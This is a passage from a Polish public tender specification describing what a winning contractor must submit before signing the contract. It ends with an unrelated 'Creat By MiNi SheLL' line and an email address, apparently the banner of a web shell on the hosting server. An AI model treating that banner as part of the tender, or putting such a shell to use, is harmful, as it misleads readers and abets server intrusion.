zawrzeć umowę w sprawie<br/>zamówienia na warunkach określonych w projektowanych postanowieniach umowy, które stanowią załącznik nr 12 do SWZ.<br/>Umowa zostanie uzupełniona o zapisy wynikające ze złożonej oferty.<br/>20.5. Wykonawca, przed podpisaniem umowy, powinien przedłożyć:<br/>- w przypadku konsorcjum lub spółki cywilnej - umowę regulującą współpracę Wykonawców działających wspólnie (umowa<br/>konsorcjum lub umowa spółki cywilnej).<br/>20.6. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego, Zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w<br/>postępowaniu Wykonawców albo unieważnić postępowanie (art. 263 ustawy Pzp).<br/>Wykonawca, którego oferta została wybrana jako najkorzystniejsza, zostanie poinformowany przez Zamawiającego o<br/>miejscu i terminie podpisania umowy.<br/>20.8. Najpóźniej w dniu podpisania umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu:<br/> kosztorys ofertowy,<br/> zabezpieczenie należytego wykonania umowy (wniesione przez Wykonawcę przed zawarciem umowy),<br/> Wykonawca składa wykaz osób oddelegowanych do realizacji zamówienia wraz z oświadczeniem o tym, że są zatrudnieni<br/>na podstawie umowy o pracę przed przystąpieniem do wykonywania robót najpóźniej w dniu podpisania umowy,<br/> w przypadku wykonawców występujących wspólnie – kopię umowy regulującej współpracę tych Wykonawców zawierającą<br/>w swojej treści następujące postanowienia:<br/>• sposób ich współdziałania,<br/>• zakres czynności powierzonych do wykonania każdemu z nich,<br/>• numer i nazwę rachunku bankowego, na który będą dokonywane płatności z tytułu realizacji kontraktu,<br/>• solidarną odpowiedzialność za wykonanie zamówienia,<br/>• wskazanie, że jeden z Wykonawców jest upoważniony do zaciągania zobowiązań i do przyjmowania instrukcji na rzecz i w<br/>imieniu wszystkich Wykonawców razem i każdego z osobna oraz do przyjmowania płatności od Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com